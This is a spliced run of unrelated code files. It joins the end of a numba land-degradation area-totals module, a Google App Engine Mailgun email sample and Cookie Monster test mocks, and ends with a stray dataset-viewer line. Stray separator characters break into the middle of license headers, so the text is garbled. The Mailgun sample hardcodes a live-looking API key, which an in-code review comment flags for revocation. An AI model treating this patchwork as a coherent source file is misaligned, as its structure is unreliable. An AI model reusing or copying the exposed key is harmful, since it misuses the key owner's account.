    d[d < 0] = 0
    totals = np.zeros(trans.size, dtype=np.float32)
    for i in range(trans.size):
        # Only sum values for this_trans, and where soc has a valid value
        # (negative values are missing data flags)
        vals = d[trans_a == trans[i]] * cell_areas[trans_a == trans[i]]
        totals[i] += np.sum(vals)
    return trans, totals
# @cc.export('ldn_total_by_trans_merge', '(f4[:], i2[:], f4[:], i2[:])')
# def ldn_total_by_trans_merge(total1, trans1, total2, trans2):
# """Calculates a total table for an array"""
# # Combine past totals with these totals
# trans = np.unique(np.concatenate((trans1, trans2)))
# totals = np.zeros(trans.size, dtype=np.float32)
# for i in range(trans.size):
# trans1_loc = np.where(trans1 == trans[i])[0]
# trans2_loc = np.where(trans2 == trans[i])[0]
# if trans1_loc.size > 0:
# totals[i] = totals[i] + total1[trans1_loc[0]]
# if trans2_loc.size > 0:
# totals[i] = totals[i] + total2[trans2_loc[0]]
# return trans, totals
@cc.export('ldn_total_deg', 'f4[4](i2[:,:], b1[:,:], f4[:,:])')
def ldn_total_deg(x, water, cell_areas):
    """Calculates a total table for an array"""
    # Sums cell areas by degradation class: [improved, stable, degraded, no data].
    flat = x.ravel()
    areas = cell_areas.ravel()
    # Flag water pixels so they fall outside every summed class below.
    flat[water.ravel()] = -32767
    totals = np.zeros((4), dtype=np.float32)
    totals[0] = np.sum(areas[flat == 1])
    totals[1] = np.sum(areas[flat == 0])
    totals[2] = np.sum(areas[flat == -1])
    totals[3] = np.sum(areas[flat == -32768])
    return totals
if __name__ == "__main__":
    # Ahead-of-time compile the exported functions into 'calculate_numba'.
    # NOTE(review): if numba was not importable, cc is a CCSubstitute with no
    # compile() method, so this would raise AttributeError -- confirm the
    # script is only run where numba is installed.
    cc.compile()
|
#!/usr/bin/env python
# Copyright 2015 Google Inc.
#
# Licensed under the Apache License | , Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permission | s and
# limitations under the License.
"""
Sample Google App Engine application that demonstrates how to send mail using
Mailgun.
For more information, see README.md.
"""
from urllib import urlencode
import httplib2
import webapp2
# Your Mailgun Domain Name
MAILGUN_DOMAIN_NAME = 'isrealconsulting.com'
# Your Mailgun API key
# SECURITY NOTE(review): a live-looking API key is hardcoded in source.
# It should be revoked and loaded from configuration or the environment.
MAILGUN_API_KEY = 'key-1ffd59a9c3afdcf762f22b21129c13f6'
# [START simple_message]
def _post_message(recipient, html=None):
    """POST a test message to the Mailgun HTTP API.

    Shared implementation for send_simple_message / send_complex_message
    (their bodies were previously duplicated except for the 'html' field).

    Args:
        recipient: destination email address.
        html: optional HTML body sent alongside the plain-text body.

    Raises:
        RuntimeError: if Mailgun responds with a non-200 status.
    """
    http = httplib2.Http()
    # Mailgun uses HTTP basic auth with the fixed user name 'api'.
    http.add_credentials('api', MAILGUN_API_KEY)
    url = 'https://api.mailgun.net/v3/{}/messages'.format(MAILGUN_DOMAIN_NAME)
    data = {
        'from': 'Isreal Consulting Webmaster <webmaster@{}>'.format(MAILGUN_DOMAIN_NAME),
        'to': recipient,
        'subject': 'This is an example email from ICLLC code site codepy',
        'text': 'Test message from codepy-1'
    }
    if html is not None:
        data['html'] = html
    resp, content = http.request(url, 'POST', urlencode(data))
    if resp.status != 200:
        raise RuntimeError(
            'Mailgun API error: {} {}'.format(resp.status, content))


def send_simple_message(recipient):
    """Send a plain-text test message to ``recipient`` via Mailgun."""
    _post_message(recipient)
# [END simple_message]


# [START complex_message]
def send_complex_message(recipient):
    """Send a test message with both text and HTML bodies via Mailgun."""
    _post_message(
        recipient,
        html='<html>HTML <strong>version</strong> of the body</html>')
# [END complex_message]
class MainPage(webapp2.RequestHandler):
    """Renders a minimal mail form and dispatches sending on submit."""
    def get(self):
        """Serve the form: one recipient field, two submit buttons."""
        self.response.content_type = 'text/html'
        self.response.write("""
<!doctype html>
<html><head><title>Isreal Consulting</title></head>
<body>
<form method="POST">
<input type="text" name="recipient" placeholder="Enter recipient email">
<input type="submit" name="submit" value="Send simple email">
<input type="submit" name="submit" value="Send complex email">
</form>
</body></html>
""")
    def post(self):
        """Send a simple or complex email depending on which button was clicked."""
        recipient = self.request.get('recipient')
        # Both submit buttons share the name 'submit'; dispatch on the value.
        action = self.request.get('submit')
        if action == 'Send simple email':
            send_simple_message(recipient)
        else:
            send_complex_message(recipient)
        self.response.write('Mail sent')
# WSGI application: route the site root to MainPage; debug=True surfaces
# tracebacks in HTTP responses (development setting).
app = webapp2.WSGIApplication([
    ('/', MainPage)
], debug=True)
"""
Legalese
--------
Copyright (c) 2015, | 2016 Genome Research Ltd.
Author: Colin Nolan <cn13@sanger.ac.uk>
This file is part of Cookie Monster.
Cookie Monster is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by the
Free Software Foundation; either version 3 of the License, or (at your
option) any later version.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS | FOR A PARTICULAR PURPOSE. See the GNU General
Public License for more details.
You should have received a copy of the GNU General Public License along
with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from unittest.mock import MagicMock
from hgicommon.mixable import Priority
from cookiemonster.cookiejar import CookieJar
from cookiemonster.cookiejar.in_memory_cookiejar import InMemoryCookieJar
from cookiemonster.processor.models import Rule
def create_mock_rule(priority: int=Priority.MIN_PRIORITY) -> Rule:
    """
    Creates a mock `Rule` whose matching criterion and action both always
    evaluate to `True`.
    :param priority: (optional) the priority of the rule
    :return: the created rule
    """
    def _always_matches(file_update, data_environment):
        return True

    def _trivial_action(file_update, data_environment):
        return True

    return Rule(_always_matches, _trivial_action, "my_rule", priority=priority)
def create_magic_mock_cookie_jar() -> CookieJar:
    """
    Creates a magic mock `CookieJar`: it behaves like an `InMemoryCookieJar`
    but all of its methods are wrapped in `MagicMock`s so their usage is
    recorded.
    :return: the created magic mock
    """
    cookie_jar = InMemoryCookieJar()
    # Capture the real implementations before replacing the attributes so
    # that each mock can delegate to the genuine behaviour.
    original_get_next_for_processing = cookie_jar.get_next_for_processing
    original_enrich_cookie = cookie_jar.enrich_cookie
    # Fixed: this was previously bound to `mark_as_complete`, which made
    # calls to `mark_as_failed` silently behave like successful completion.
    original_mark_as_failed = cookie_jar.mark_as_failed
    original_mark_as_completed = cookie_jar.mark_as_complete
    original_mark_as_reprocess = cookie_jar.mark_for_processing
    cookie_jar.get_next_for_processing = MagicMock(side_effect=original_get_next_for_processing)
    cookie_jar.enrich_cookie = MagicMock(side_effect=original_enrich_cookie)
    cookie_jar.mark_as_failed = MagicMock(side_effect=original_mark_as_failed)
    cookie_jar.mark_as_complete = MagicMock(side_effect=original_mark_as_completed)
    cookie_jar.mark_for_processing = MagicMock(side_effect=original_mark_as_reprocess)
    return cookie_jar
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.